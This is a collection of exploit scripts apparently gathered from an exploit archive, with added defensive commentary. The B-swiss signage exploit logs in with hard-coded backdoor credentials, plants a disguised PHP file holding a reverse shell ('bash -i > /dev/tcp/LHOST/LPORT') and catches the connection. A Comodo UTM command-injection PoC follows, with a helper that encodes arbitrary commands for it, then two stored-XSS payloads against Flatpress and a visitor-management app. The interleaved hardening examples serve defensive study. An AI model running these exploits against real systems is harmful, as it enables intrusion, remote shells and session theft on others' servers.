from six.moves import input# #-----------------+-----------------# #tupni trompi sevom.xis morf
from time import sleep#      |              01 | 04              |      #peels trompi emit morf
import urllib.request#       |                 |              |  |       #tseuqer.billru tropmi
import urllib.parse#         |                 |              |  |         #esrap.billru tropmi
import telnetlib#            |                 |                 |            #biltenlet tropmi
import threading#            |  |              |                 |            #gnidaerht tropmi
import requests#             |  |              |                 |             #stseuqer tropmi
import socket#               |                 |    o            |               #tekcos tropmi
import sys,re#               |                 |                 |               #er,sys tropmi
##############               #-----------------+-----------------#               ##############
###############                               oOo                               ###############
################                               |                               ################
####################                           Y                           ####################
############################                   _                   ############################
###############################################################################################

class Sign:
    
    def __init__(self):
        self.username = b"\x61\x64\x6d\x69\x6e\x5f\x6d"
        self.altruser = b"\x62\x2d\x73\x77\x69\x73\x73"
        self.password = b"\x44\x50\x36\x25\x57\x33\x64"
        self.agent = "SignageBot/1.02"
        self.fileid = "251"
        self.payload = None
        self.answer = False
        self.params = None
        self.rhost = None
        self.lhost = None
        self.lport = None
        self.send = None

    def env(self):
        if len(sys.argv) != 4:
            self.usage()
        else:
            self.rhost = sys.argv[1]
            self.lhost = sys.argv[2]
            self.lport = int(sys.argv[3])
            if not "http" in self.rhost:
                self.rhost = "http://{}".format(self.rhost)

    def usage(self):
        self.roger()
        print("Usage: python3 {} <RHOST[:RPORT]> <LHOST> <LPORT>".format(sys.argv[0]))
        print("Example: python3 {} 192.168.10.11:80 192.168.10.22 7777\n".format(sys.argv[0]))
        exit(0)

    def roger(self):
        waddup = """
       ____________________
      /                    \\
      !      B-swiss 3     !
      !         RCE        !
      \____________________/
               !  !
               !  !
               L_ !
              / _)!
             / /__L
____________/ (____)
              (____)
____________  (____)
            \_(____)
               !  !
               !  !
               \__/  
        """
        print(waddup)

    def test(self):
        print("[*] Checking target...")
        try:
            r = requests.get(self.rhost)
            response = r.text
            if not "B-swiss" in response:
                print("[!] Not a b-swiss system")
                exit(0)
            if "B-swiss" in response:
                print("[*] Good to go!")
                next
            else:
                exit(-251)
        except Exception as e:
            print("[!] Ney ney: {msg}".format(msg=e))
            exit(-1)

    def login(self):
        token = ""
        cj = CookieJar()
        self.params = {"locator"  : "visitor.ProcessLogin",
                       "username" : self.username,
                       "password" : self.password,
                       "x"        : "0",
                       "y"        : "0"}

        damato = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
        damato.addheaders.pop()
        damato.addheaders.append(("User-Agent", self.agent))
        
        try:
            print("[*] Getting backdoor session...")
            damato.open(self.rhost + "/index.php", urllib.parse.urlencode(self.params).encode('utf-8'))
            for cookie in cj:
                token = cookie.value
                print("[*] Got master backdoor cookie: "+token)
        except urllib.request.URLError as e:
            print("[!] Connection error: {}".format(e.reason))

        return token

    def upload(self):
        j = "\r\n"
        self.cookies = {"PNU_RAD_LIB"     : self.rtoken}
        self.headers = {"Cache-Control"   : "max-age=0",
                        "Content-Type"    : "multipart/form-data; boundary=----j",
                        "User-Agent"      : self.agent,
                        "Accept-Encoding" : "gzip, deflate",
                        "Accept-Language" : "en-US,en;q=0.9",
                        "Connection"      : "close"}
    
        self.payload = "<?php exec(\"/bin/bash -c 'bash -i > /dev/tcp/"+self.lhost+"/"+str(self.lport)+" <&1;rm "+self.fileid+".php'\");"

        print("[*] Adding GUI credentials: test:123456")
        # rec_adminlevel values:
        # ----------------------
        # 100000 - "b-swiss Maintenance Admin" (Undocumented privilege)
        #      7 - "B-swiss admin" <---------------------------------------------------------------------------------------+
        #      8 - Other                                                                                                   |
        #                                                                                                                  |
        self.send  = "------j{}Content-Disposition: form-data; ".format(j)#                                                |
        self.send += "name=\"locator\"{}Users.Save{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)#            |
        self.send += "name=\"page\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)#                             |
        self.send += "name=\"sort\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)#                             |
        self.send += "name=\"id\"{}{}{}------j\r\nContent-Disposition: form-data; ".format(j*2,self.fileid,j,j)#           |
        self.send += "name=\"ischildgrid\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)#                      |
        self.send += "name=\"inpopup\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)#                          |
        self.send += "name=\"ongridpage\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)#                       |
        self.send += "name=\"rowid\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)#                            |
        self.send += "name=\"preview_screenid\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)#                 |
        self.send += "name=\"rec_firstname\"{}TestF{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)#           |
        self.send += "name=\"rec_lastname\"{}TestL{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)#            |
        self.send += "name=\"rec_email\"{}test@test.cc{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)#        |
        self.send += "name=\"rec_username\"{}test{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)#             |
        self.send += "name=\"rec_password\"{}123456{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)#           |
        self.send += "name=\"rec_cpassword\"{}123456{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)#          |
        self.send += "name=\"rec_adminlevel\"{}7{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)#   <----------+
        self.send += "name=\"rec_status\"{}1{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)
        self.send += "name=\"rec_poza\"; filename=\"Blank.jpg.php\"{}Content-Type: application/octet-stream{}".format(j,j*2)
        self.send += self.payload+"{}------j{}Content-Disposition: form-data; ".format(j,j)
        self.send += "name=\"rec_poza_face\"{}C:\\fakepath\\Blank.jpg{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)
        self.send += "name=\"rec_language\"{}french-sw{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)
        self.send += "name=\"rec_languages[]\"{}2{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)
        self.send += "name=\"rec_can_change_password\"{}1{}------j--{}".format(j*2,j,j)
    
        requests.post(self.rhost+"/index.php", headers=self.headers, cookies=self.cookies, data=self.send)
        print("[*] Executing and deleting stager file")
        r = requests.get(self.rhost+"/usr/users/"+self.fileid+".php")
        sleep(1)

        self.answer = input("[?] Want me to remove the GUI credentials? ").strip()
        if self.answer[0] == "y" or self.answer[0] == "Y":
            print("[*] Removing...")
            requests.get(self.rhost+"/index.php?locator=Users.Delete&id="+self.fileid, headers=self.headers, cookies=self.cookies)
        if self.answer[0] == "n" or self.answer[0] == "N":
            print("[*] Cool!")
        print("[*] t00t!")
        exit(-1)

    def razmisluju(self):
        print("[*] Starting callback listener child thread")
        konac = threading.Thread(name="ZSL", target=self.phone)
        konac.start()
        sleep(1)
        self.upload()

    def fish(self):
        r = requests.get(self.rhost+"/usr/users/", verify=False, allow_redirects=False)
        response = r.text
        print("[*] Checking for previous attempts...")
        if not ".php" in response:
            print("[*] All good.")
        elif "251.php" in response:
            print("[!] Stager file \"{}.php\" still present on the server".format(self.fileid))

    def phone(self):
        telnetus = telnetlib.Telnet()
        print("[*] Starting handler on port {}".format(self.lport))
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind(("0.0.0.0", self.lport))
        while True:
            try:
                s.settimeout(7)
                s.listen(1)
                conn, addr = s.accept()
                print("[*] Connection from {}:{}".format(addr[0], addr[1]))
                telnetus.sock = conn
            except socket.timeout as p:
                print("[!] No outgoing calls :( ({msg})".format(msg=p))
                print("[+] Check your port mappings or increase timeout")
                s.close()
                exit(0)
            break

        print("[*] You got shell!")
        telnetus.interact()
        conn.close()

    def main(self):
        self.env()
        self.test()
        self.fish()
        self.rtoken = self.login()
        self.razmisluju()

if __name__ == '__main__':
    Sign().main()
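The upload bug described in the header is the usual one: the file name Blank.jpg.php is accepted as an image, then stored under the record id with the client's last extension, so it lands as 251.php and is served by PHP. The following added example is mine, not B-swiss code; the weak check is a hypothetical reconstruction of the behaviour the advisory describes, not the product's actual source. It puts that weak check beside a hardened one that whitelists the final extension, verifies image magic bytes and derives the stored name from the content rather than the client. The PHP stager bytes and the JPEG header are constructed inputs.

```python
import os

ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif"}

# Standard image signatures (general knowledge, not from the advisory)
SIGNATURES = {
    b"\xff\xd8\xff": ".jpg",
    b"\x89PNG\r\n\x1a\n": ".png",
    b"GIF87a": ".gif",
    b"GIF89a": ".gif",
}

# Constructed inputs: the stager name from the exploit, a PHP body, a JPEG header
STAGER_NAME = "Blank.jpg.php"
STAGER_BODY = b"<?php exec('id'); ?>"
JPEG_BODY = b"\xff\xd8\xff\xe0" + b"\x00" * 16


def weak_is_image(filename):
    """Hypothetical weak check: accepts any name that *contains* an image
    extension. 'Blank.jpg.php' passes, and is later stored as <id>.php."""
    lower = filename.lower()
    return any(ext in lower for ext in ALLOWED_EXT)


def detected_type(data):
    """Extension implied by the leading bytes, or None if no image signature matches."""
    for magic, ext in SIGNATURES.items():
        if data.startswith(magic):
            return ext
    return None


def strict_is_image(filename, data):
    """Hardened check: the *last* extension must be whitelisted AND the bytes must
    carry a signature that agrees with it."""
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED_EXT:
        return False
    kind = detected_type(data)
    if kind is None:
        return False
    return kind == (".jpg" if ext == ".jpeg" else ext)


def stored_filename(record_id, filename, data):
    """Server-chosen name: record id plus an extension derived from the content,
    never from the client-supplied name. Returns None for rejected uploads."""
    if not strict_is_image(filename, data):
        return None
    return "{}{}".format(int(record_id), detected_type(data))


if __name__ == "__main__":
    print("weak  :", STAGER_NAME, "->", weak_is_image(STAGER_NAME))
    print("strict:", STAGER_NAME, "->", strict_is_image(STAGER_NAME, STAGER_BODY))
    print("stored:", stored_filename(251, "Blank.jpg", JPEG_BODY))
```

The magic-byte check alone is not the defence: a valid JPEG with PHP appended still starts with FF D8 FF. What stops code execution is that the stored name can only end in a whitelisted image extension, combined with serving the upload directory with script execution disabled.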
            
# Exploit Title: Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution
# Date: 2018-08-15
# Exploit Author: Milad Fadavvi
# Author's LinkedIn: https://www.linkedin.com/in/fadavvi/
# Vendor Homepage: https://www.comodo.com/
# Version: Releases before 2.7.0 & 1.5.0 
# Tested on: Windows=Firefox/chrome - Kali=firefox
# PoC & other infos: https://github.com/Fadavvi/CVE-2018-17431-PoC
# CVE : CVE-2018-17431
# CVE-detailes: https://nvd.nist.gov/vuln/detail/CVE-2018-17431
# CVSS 3 score: 9.8 

import requests

def RndInt(length):
    """Random digit string of the given length; fills the console's session and size parameters."""
    from random import choice
    from string import digits

    return ''.join([choice(digits) for n in range(length)])

if __name__ == "__main__":

    IP = input("IP: ")
    Port = input("Port: ")

    # Percent-encoded CLI input "service\nssh\ndisable\n": disables SSH on the appliance
    Command = '%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a'
    '''For more info about the command syntax, read the manual of the specific Comodo UTM
       version and the exploit PoC (https://github.com/Fadavvi/CVE-2018-17431-PoC)
    '''

    BaseURL = "https://" + IP + ":" + Port + "/manage/webshell/u?s=" + RndInt(1) + "&w=" + RndInt(3) + "&h=" + RndInt(2)
    BaseNComdURL = BaseURL + "&k=" + Command
    LastPart = "&l=" + RndInt(2) + "&_=" + RndInt(13)
    FullURL = BaseNComdURL + LastPart
    AdditionalEnter = BaseURL + "&k=%0a" + LastPart   # a second request sending only Enter

    try:
        # Add verify=False to both requests if the appliance uses a self-signed certificate
        FirstResponse = requests.get(FullURL).text
    except requests.RequestException:
        print('\nExploit failed due to an HTTP error. Check the given IP and port!\n')
        exit(1)

    SecondResponse = requests.get(AdditionalEnter).text
    if SecondResponse.find("Configuration has been altered") == -1:
        print("\nExploit failed!\n")
        exit(1)
    else:
        print("\nOK! Command ran!\n")
    exit(0)
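The Command constant above is opaque as written. The following added example (mine, not from the PoC) generalises it: it percent-encodes arbitrary newline-terminated CLI lines in the same all-bytes style, decodes the page's constant back to text, and builds the two-request sequence the exploit sends. The parameter values passed to the webshell endpoint are fixed here instead of random so the result is reproducible; the command syntax itself is the appliance's, as referenced in the PoC.

```python
from urllib.parse import unquote


def encode_cli(lines):
    """Percent-encode every byte of a newline-terminated CLI transcript, in the
    all-bytes style the advisory's Command constant uses."""
    text = "".join(line + "\n" for line in lines)
    return "".join("%{:02x}".format(b) for b in text.encode("utf-8"))


def decode_cli(encoded):
    """Reverse of encode_cli: shows what an opaque k= parameter actually types."""
    return unquote(encoded)


def build_request_urls(ip, port, lines, s="1", w="123", h="12", l="12", ts="1234567890123"):
    """Returns (command_url, enter_url): the exploit first sends the command lines,
    then a lone newline, and looks for 'Configuration has been altered' in the
    second response. s/w/h/l/_ mirror the parameters the PoC fills with random digits."""
    base = "https://{}:{}/manage/webshell/u?s={}&w={}&h={}".format(ip, port, s, w, h)
    tail = "&l={}&_={}".format(l, ts)
    return base + "&k=" + encode_cli(lines) + tail, base + "&k=%0a" + tail


if __name__ == "__main__":
    page_constant = "%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a"
    print(repr(decode_cli(page_constant)))
    for url in build_request_urls("10.0.0.1", "10443", ["service", "ssh", "disable"]):
        print(url)
```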
            
# Exploit Title: Flatpress Add Blog 1.0.3 - Persistent Cross-Site Scripting
# Date: 2020-09-19
# Exploit Author: Alperen Ergel
# Vendor Homepage: https://www.flatpress.org/
# Software Link: https://github.com/evacchi/flatpress/releases/tag/v1.0.3
# Version: 1.0.3 
# Tested on: windows 10 / xampp 
# CVE : CVE-2020-35241


# Proof of Concept

POST /flatpress/admin.php?p=entry&action=write HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 223
Origin: http://localhost/
Connection: close
Referer: http://localhost/flatpress/admin.php?p=entry&action=write
Cookie: fpuser_fp-a53f4609=opensourcecms; fppass_fp-a53f4609=79dc9a3c529fcd0d9dc4fc7ff22187b6; fpsess_fp-a53f4609=71v18tu3lsc0s021q2pj8a3je7; _ga=GA1.2.487908813.1600520069; _gid=GA1.2.951134816.1600520069; _gat=1
Upgrade-Insecure-Requests: 1

_wpnonce=4fc4222db1&_wp_http_referer=%2Fflatpress%2Fadmin.php%3Fp%3Dentry%26action%3Dwrite&subject=XSS&timestamp=1600526382&entry=entry200919-143942&attachselect=--&imageselect=--&content=<img src=x onerror='alert("TEST XSS")'/>&savecontinue=Save%26Continue


# Snippet

content=[PAYLOAD] //<img src=x onerror='alert("TEST XSS")'/>
            
# Title: Visitor Management System in PHP 1.0 - Persistent Cross-Site Scripting
# Exploit Author: Rahul Ramkumar
# Date: 2020-09-16
# Vendor Homepage: https://projectworlds.in
# Software Link: https://projectworlds.in/wp-content/uploads/2020/07/Visitor-Management-System-in-PHP.zip
# Version: 1.0
# Tested On: Windows 10 Enterprise 1809 (x64_86) + XAMPP 7.2.33-1
# CVE: N/A
# Description: The file myform.php does not perform input validation on the request parameters. An attacker can inject JavaScript payloads into the parameters to perform various attacks, such as stealing cookies or other sensitive information.

import requests, sys
from lxml import etree
from io import StringIO
from colorama import Fore, Style
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

def print_usage(STRING):
    return Style.BRIGHT+Fore.YELLOW+STRING+Fore.RESET

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(print_usage("Usage:\t\t python %s <WEBAPP_URL>" % sys.argv[0]))
        print(print_usage("Example:\t python %s 'https://192.168.1.72:443/visitor_management/'" % sys.argv[0]))
        sys.exit(-1)
    SERVER_URL = sys.argv[1]
    XSS_DIR = '/myform.php'
    XSS_URL = SERVER_URL + XSS_DIR
    XSS_PoC_URL = SERVER_URL + '/front.php'

    s = requests.Session()
    s.get(SERVER_URL, verify=False)
    # The stored payload goes into the 'comment' field of the visitor form
    payload   = {'name': 'd3crypt','cno':'9876543210','purpose':'stored xss','MeetingTo':'Hack','comment':'<script>alert("xss")</script>','submit_post':'Submit','mydata':''}
    r1 = s.post(url=XSS_URL, data=payload, verify=False)
    r2 = s.get(XSS_PoC_URL, allow_redirects=False, verify=False)
    response_page = r2.content.decode("utf-8")
    parser = etree.HTMLParser()
    tree = etree.parse(StringIO(response_page), parser=parser)

    def get_links(tree):
        # front.php lists each visitor as an <a> whose data-content attribute carries the record
        refs = tree.xpath("//a")
        return [link.get('data-content', '') for link in refs]

    visitors = get_links(tree)
    #print(visitors)

    for visitor in visitors:
        if 'stored xss' in visitor:
            rid = visitor.split(':')[6].strip()
            print(print_usage('Make the logged-in user click this URL: ' + XSS_PoC_URL + '?rid=' + rid))
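Both the Flatpress entry above and this Visitor Management System store a field and later print it into HTML unescaped. The following added example is mine, not code from either project: it renders a constructed visitor record through a vulnerable template and an escaped one, then uses Python's html.parser to list what a browser would execute in each. The template and the record are assumptions; the two comment payloads are the ones from the advisories, and the 'purpose' value is a constructed attribute-breakout payload added to show that quote escaping matters inside attributes, a case neither advisory exercises.

```python
import html
from html.parser import HTMLParser

# Constructed sample record. 'comment' is the payload the PoC above submits to
# myform.php; 'purpose' carries a constructed attribute-breakout value.
VISITOR = {
    "name": "d3crypt",
    "purpose": 'x" onmouseover="alert(1)',
    "comment": '<script>alert("xss")</script>',
}
# The Flatpress advisory's payload, used below as an alternative comment
FLATPRESS_PAYLOAD = "<img src=x onerror='alert(\"TEST XSS\")'/>"

# Assumed page template: one attribute context (title) and one text context (div)
TEMPLATE = '<a href="#" title="{purpose}">{name}</a><div class="comment">{comment}</div>'


def render_vulnerable(record):
    """Interpolates user data straight into markup: the bug class of both advisories."""
    return TEMPLATE.format(**record)


def render_safe(record):
    """Escapes every field; quote=True also turns " and ' into entities, which is
    what keeps an attribute value from terminating early."""
    return TEMPLATE.format(**{k: html.escape(v, quote=True) for k, v in record.items()})


class ActiveContentFinder(HTMLParser):
    """Reports elements a browser would execute: <script> tags and on* handlers."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script")
        for name, _value in attrs:
            if name.lower().startswith("on"):
                self.findings.append("{}@{}".format(tag, name.lower()))


def find_active_content(markup):
    """Parses rendered HTML the way a browser tokenises it and returns the
    executable pieces found; an empty list means nothing would run."""
    p = ActiveContentFinder()
    p.feed(markup)
    p.close()
    return p.findings


if __name__ == "__main__":
    for label, record in (("visitor", VISITOR),
                          ("flatpress", dict(VISITOR, comment=FLATPRESS_PAYLOAD))):
        print(label, "vulnerable:", find_active_content(render_vulnerable(record)))
        print(label, "safe      :", find_active_content(render_safe(record)))
```

The parser-based check is the honest way to test this: grepping the escaped output for `onerror=` would still match, because escaping changes `<` and `"`, not the word; what matters is whether a tokeniser sees a tag or an attribute, and after html.escape it does not.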